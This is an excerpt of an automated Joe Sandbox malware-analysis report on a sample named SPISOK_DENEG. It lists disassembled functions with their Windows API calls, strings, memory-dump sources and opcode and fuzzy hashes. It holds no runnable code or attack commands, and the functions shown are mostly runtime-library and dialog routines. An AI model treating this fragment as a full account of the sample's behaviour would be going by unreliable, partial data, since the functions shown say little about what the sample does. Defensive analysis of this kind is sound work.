                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: %s%s%u
                                                            • API String ID: 110358324-1360425832
                                                            • Opcode ID: 5f2bfd0f6674cd4e8f2a70b177b93c0331a7f895f6a4ef1f48b72aefa626f4b4
                                                            • Instruction ID: a4517c6670fe7fbced3180e6926f43b8984c10619837b797b2ce96162fbaeb59
                                                            • Opcode Fuzzy Hash: 5f2bfd0f6674cd4e8f2a70b177b93c0331a7f895f6a4ef1f48b72aefa626f4b4
                                                            • Instruction Fuzzy Hash: 4F418FB1900298AEDF659B61CC45EEE77FDEB05300F4080A7F909F7541EA719A858FA1
                                                            Function 000DBB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 000DBB27
                                                            • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,000DA275,?,?,00000800,?,000DA23A,?,000D755C), ref: 000DBBC5
                                                            • _wcslen.LIBCMT ref: 000DBC3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CurrentDirectory
                                                            • String ID: UNC$\\?\
                                                            • API String ID: 3341907918-253988292
                                                            • Opcode ID: b18987b08de7fc3d1f91a395a6f86ef4acf5711fea84b3b597ee3f698490ba54
                                                            • Instruction ID: 1f317ced52c6ac5df3291aa1f4397ffb453438e36fa5b5e18149c84fdf9122c6
                                                            • Opcode Fuzzy Hash: b18987b08de7fc3d1f91a395a6f86ef4acf5711fea84b3b597ee3f698490ba54
                                                            • Instruction Fuzzy Hash: 5D418C35410359EACF21AF21CC01EEF77A9BF45790F114467F964A3292EBB09A908B70
                                                            Function 000EB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadBitmapW.USER32(00000065), ref: 000EB6ED
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 000EB712
                                                            • DeleteObject.GDI32(00000000), ref: 000EB744
                                                            • DeleteObject.GDI32(00000000), ref: 000EB767
                                                              • Part of subcall function 000EA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,000EB73D,00000066), ref: 000EA6D5
                                                              • Part of subcall function 000EA6C2: SizeofResource.KERNEL32(00000000,?,?,?,000EB73D,00000066), ref: 000EA6EC
                                                              • Part of subcall function 000EA6C2: LoadResource.KERNEL32(00000000,?,?,?,000EB73D,00000066), ref: 000EA703
                                                              • Part of subcall function 000EA6C2: LockResource.KERNEL32(00000000,?,?,?,000EB73D,00000066), ref: 000EA712
                                                              • Part of subcall function 000EA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,000EB73D,00000066), ref: 000EA72D
                                                              • Part of subcall function 000EA6C2: GlobalLock.KERNEL32(00000000), ref: 000EA73E
                                                              • Part of subcall function 000EA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 000EA762
                                                              • Part of subcall function 000EA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 000EA7A7
                                                              • Part of subcall function 000EA6C2: GlobalUnlock.KERNEL32(00000000), ref: 000EA7C6
                                                              • Part of subcall function 000EA6C2: GlobalFree.KERNEL32(00000000), ref: 000EA7CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                            • String ID: ]
                                                            • API String ID: 1797374341-3352871620
                                                            • Opcode ID: ad23587ef98e1981fcf0516984c8ab7131b6440f14421d40e7aa8b85700cc9fa
                                                            • Instruction ID: bca7a08176895584c36e8c6dd9fa30017fcd5881f6052257c2cc300d3a8bc269
                                                            • Opcode Fuzzy Hash: ad23587ef98e1981fcf0516984c8ab7131b6440f14421d40e7aa8b85700cc9fa
                                                            • Instruction Fuzzy Hash: CE014532A00241AFD71277768C49AFFBAB99FC6B62F080011F990B7292DF318D4942A1
                                                            Function 000ED600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000D1316: GetDlgItem.USER32(00000000,00003021), ref: 000D135A
                                                              • Part of subcall function 000D1316: SetWindowTextW.USER32(00000000,001035F4), ref: 000D1370
                                                            • EndDialog.USER32(?,00000001), ref: 000ED64B
                                                            • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 000ED661
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 000ED675
                                                            • SetDlgItemTextW.USER32(?,00000068), ref: 000ED684
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: RENAMEDLG
                                                            • API String ID: 445417207-3299779563
                                                            • Opcode ID: c2c03266a667748012923608fb55df79b0f2e06744658d6bd9bfd7bbbb23ff7f
                                                            • Instruction ID: 1a302616e1e7d04b942e4e6ecb2a8ef6d735b16e8817e273e4040533c0de0e10
                                                            • Opcode Fuzzy Hash: c2c03266a667748012923608fb55df79b0f2e06744658d6bd9bfd7bbbb23ff7f
                                                            • Instruction Fuzzy Hash: 5A012833284354BED2244F659E09F5B77ADFB5AB01F010416F305B24D0C7A2D9559B79
                                                            Function 000F7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,000F7E24,00000000,?,000F7DC4,00000000,0010C300,0000000C,000F7F1B,00000000,00000002), ref: 000F7E93
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000F7EA6
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,000F7E24,00000000,?,000F7DC4,00000000,0010C300,0000000C,000F7F1B,00000000,00000002), ref: 000F7EC9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: b0ed5efdd04ecbc36358758b5d4ca933d0a12ba6523dc276683021aad76da0d7
                                                            • Instruction ID: 2819a5bee7949df4fd6f257a5bc6c8d3e531d364ffef3bfd43be2a5a3f2b6fd5
                                                            • Opcode Fuzzy Hash: b0ed5efdd04ecbc36358758b5d4ca933d0a12ba6523dc276683021aad76da0d7
                                                            • Instruction Fuzzy Hash: 5CF0683190420CBBDB119FA5DC09BEEBFF8EF44711F0040A9F859E2550DBB09E80DA91
                                                            Function 000DF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000E081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000E0836
                                                              • Part of subcall function 000E081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000DF2D8,Crypt32.dll,00000000,000DF35C,?,?,000DF33E,?,?,?), ref: 000E0858
                                                            • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 000DF2E4
                                                            • GetProcAddress.KERNEL32(001181C8,CryptUnprotectMemory), ref: 000DF2F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                            • API String ID: 2141747552-1753850145
                                                            • Opcode ID: 61ca9ef80f1d68ac04cb57594b3c2b673ae7259608f6ce65913c47d5ee863bd4
                                                            • Instruction ID: d36eac743f52cdd5b45fa0ac7afea1fc266f58d2bdb4fdd502527b28423f46c1
                                                            • Opcode Fuzzy Hash: 61ca9ef80f1d68ac04cb57594b3c2b673ae7259608f6ce65913c47d5ee863bd4
                                                            • Instruction Fuzzy Hash: B0E04F70A11742AEC7219F35984DB517AD86F04700B14C81EF0EAE3A84DBF4D5818B50
                                                            Function 000F2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: AdjustPointer$_abort
                                                            • String ID:
                                                            • API String ID: 2252061734-0
                                                            • Opcode ID: a513f52d22200e8eaa9f5fd80ec5c1efb9e4beb16ef387f6af1125a68881208e
                                                            • Instruction ID: 098bad81afd4567d7310c5396db67dc9ea47c9ae53cd8dd6c1850c42493085f1
                                                            • Opcode Fuzzy Hash: a513f52d22200e8eaa9f5fd80ec5c1efb9e4beb16ef387f6af1125a68881208e
                                                            • Instruction Fuzzy Hash: EF51E17260121AAFEB298F14D845BBA77A4FF54310F24412DEE0147EA2D732ED90FB90
                                                            Function 000FBF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 000FBF39
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000FBF5C
                                                              • Part of subcall function 000F8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,000FCA2C,00000000,?,000F6CBE,?,00000008,?,000F91E0,?,?,?), ref: 000F8E38
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 000FBF82
                                                            • _free.LIBCMT ref: 000FBF95
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000FBFA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                            • String ID:
                                                            • API String ID: 336800556-0
                                                            • Opcode ID: 8647f0ab0a18f4b22f35066ff24e64b68758aa1f040ccb68b0b293748648b93b
                                                            • Instruction ID: ab9ff7420327520968f397df99f9ff74160e9fd350920a8a0adf7a3ac6f02890
                                                            • Opcode Fuzzy Hash: 8647f0ab0a18f4b22f35066ff24e64b68758aa1f040ccb68b0b293748648b93b
                                                            • Instruction Fuzzy Hash: 4E0184726056197F632116769C4DDBB7AADDFC6BA13144139FB04C2941EFB08D06A9B0
                                                            Function 000F9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,000F91AD,000FB188,?,000F9813,00000001,00000364,?,000F3F73,00000050,?,00111030,00000200), ref: 000F986E
                                                            • _free.LIBCMT ref: 000F98A3
                                                            • _free.LIBCMT ref: 000F98CA
                                                            • SetLastError.KERNEL32(00000000,?,00111030,00000200), ref: 000F98D7
                                                            • SetLastError.KERNEL32(00000000,?,00111030,00000200), ref: 000F98E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: 3075967a32d39392842349394f58c691dd4478a169c373a5d740cc514d913b60
                                                            • Instruction ID: 0b07ab819b17e74b5dafd85586bc5c217d049a271833e3a303c0bdd45401aee4
                                                            • Opcode Fuzzy Hash: 3075967a32d39392842349394f58c691dd4478a169c373a5d740cc514d913b60
                                                            • Instruction Fuzzy Hash: C201D13624560D6BC3226666AC85BBB36AD9FD37E0B240136F71592D92EEB08C027261
                                                            Function 000E0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000E11CF: ResetEvent.KERNEL32(?), ref: 000E11E1
                                                              • Part of subcall function 000E11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 000E11F5
                                                            • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 000E0F21
                                                            • CloseHandle.KERNEL32(?,?), ref: 000E0F3B
                                                            • DeleteCriticalSection.KERNEL32(?), ref: 000E0F54
                                                            • CloseHandle.KERNEL32(?), ref: 000E0F60
                                                            • CloseHandle.KERNEL32(?), ref: 000E0F6C
                                                              • Part of subcall function 000E0FE4: WaitForSingleObject.KERNEL32(?,000000FF,000E1206,?), ref: 000E0FEA
                                                              • Part of subcall function 000E0FE4: GetLastError.KERNEL32(?), ref: 000E0FF6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                            • String ID:
                                                            • API String ID: 1868215902-0
                                                            • Opcode ID: 1a31386653b9a91d081c792fae87ae2a570fd17b1884c4d9b6b4e380f15f767d
                                                            • Instruction ID: 2b6f69c0b41e00ffbbcd5c349477ecea802415ddd363c7428cd0b98c3663d46a
                                                            • Opcode Fuzzy Hash: 1a31386653b9a91d081c792fae87ae2a570fd17b1884c4d9b6b4e380f15f767d
                                                            • Instruction Fuzzy Hash: 57017571101744EFC7229B65DC88BC6FBADFB08710F004929F1AB62564CBB57A95CB50
                                                            Function 000FC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 000FC817
                                                              • Part of subcall function 000F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,000FC896,?,00000000,?,00000000,?,000FC8BD,?,00000007,?,?,000FCCBA,?), ref: 000F8DE2
                                                              • Part of subcall function 000F8DCC: GetLastError.KERNEL32(?,?,000FC896,?,00000000,?,00000000,?,000FC8BD,?,00000007,?,?,000FCCBA,?,?), ref: 000F8DF4
                                                            • _free.LIBCMT ref: 000FC829
                                                            • _free.LIBCMT ref: 000FC83B
                                                            • _free.LIBCMT ref: 000FC84D
                                                            • _free.LIBCMT ref: 000FC85F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 4e9f4ecea28fd936ffda7dac55cb575bddc74295ecaeec6a8ceb9f62f120655c
                                                            • Instruction ID: 295ed2d7914801f2105597cad9c3f4d85ef8269739e20846135f2acea136de3f
                                                            • Opcode Fuzzy Hash: 4e9f4ecea28fd936ffda7dac55cb575bddc74295ecaeec6a8ceb9f62f120655c
                                                            • Instruction Fuzzy Hash: 38F0623250420CABD764EB69E586CA673E9AF007907584C19F348D7D92CFB0FC81EB50
                                                            Function 000E1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 000E1FE5
                                                            • _wcslen.LIBCMT ref: 000E1FF6
                                                            • _wcslen.LIBCMT ref: 000E2006
                                                            • _wcslen.LIBCMT ref: 000E2014
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,000DB371,?,?,00000000,?,?,?), ref: 000E202F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CompareString
                                                            • String ID:
                                                            • API String ID: 3397213944-0
                                                            • Opcode ID: 90bf0a66382dccfc89a83f1ef7aecd3c5bc01e65762324116004362fcf773f34
                                                            • Instruction ID: 50147f7a10ac80ae1aa3b45f69bbab41f658dba2d826fc5447742ef66948888c
                                                            • Opcode Fuzzy Hash: 90bf0a66382dccfc89a83f1ef7aecd3c5bc01e65762324116004362fcf773f34
                                                            • Instruction Fuzzy Hash: 92F03032008058BFDF226F51EC09DDE7F2AEF54770B118415F61A6B4A2CB72D6A1E6D0
                                                            Function 000F8900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 000F891E
                                                              • Part of subcall function 000F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,000FC896,?,00000000,?,00000000,?,000FC8BD,?,00000007,?,?,000FCCBA,?), ref: 000F8DE2
                                                              • Part of subcall function 000F8DCC: GetLastError.KERNEL32(?,?,000FC896,?,00000000,?,00000000,?,000FC8BD,?,00000007,?,?,000FCCBA,?,?), ref: 000F8DF4
                                                            • _free.LIBCMT ref: 000F8930
                                                            • _free.LIBCMT ref: 000F8943
                                                            • _free.LIBCMT ref: 000F8954
                                                            • _free.LIBCMT ref: 000F8965
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 2993722739e30d27c507b9a2823078bb2aa91ddfa901ce42133c64912cb76220
                                                            • Instruction ID: 6874e62824763a763a84f30671af68a3f8b03f68833960989a2f34f68bb612b4
                                                            • Opcode Fuzzy Hash: 2993722739e30d27c507b9a2823078bb2aa91ddfa901ce42133c64912cb76220
                                                            • Instruction Fuzzy Hash: A7F0FEB181062A9BC7467F14FD034A63FF1FF257543054906F65456EB2CBB149C1EB81
                                                            Function 000E15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1676868108.00000000000D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                                                            • Associated: 00000000.00000002.1676841445.00000000000D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676934659.0000000000103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.000000000010E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000115000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1676956615.0000000000132000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1677072682.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d0000_SPISOK_DENEG.jbxd
                                                            Similarity
                                                            • API ID: _swprintf
                                                            • String ID: %ls$%s: %s
                                                            • API String ID: 589789837-2259941744
                                                            • Opcode ID: dcf6aa94ee417e0c4bb2cd59ca143bf7151c82fa27419352a532caeddde572c9
                                                            • Instruction ID: b2dca7a218614969f1b3dce95f52d19e23f7951bd36ae5536557884d9333d027
                                                            • Opcode Fuzzy Hash: dcf6aa94ee417e0c4bb2cd59ca143bf7151c82fa27419352a532caeddde572c9
                                                            • Instruction Fuzzy Hash: E251E97524C3C0FFE63126928D46FFD7665AB15F48F244507F3D6784E2C9B2A410A72A
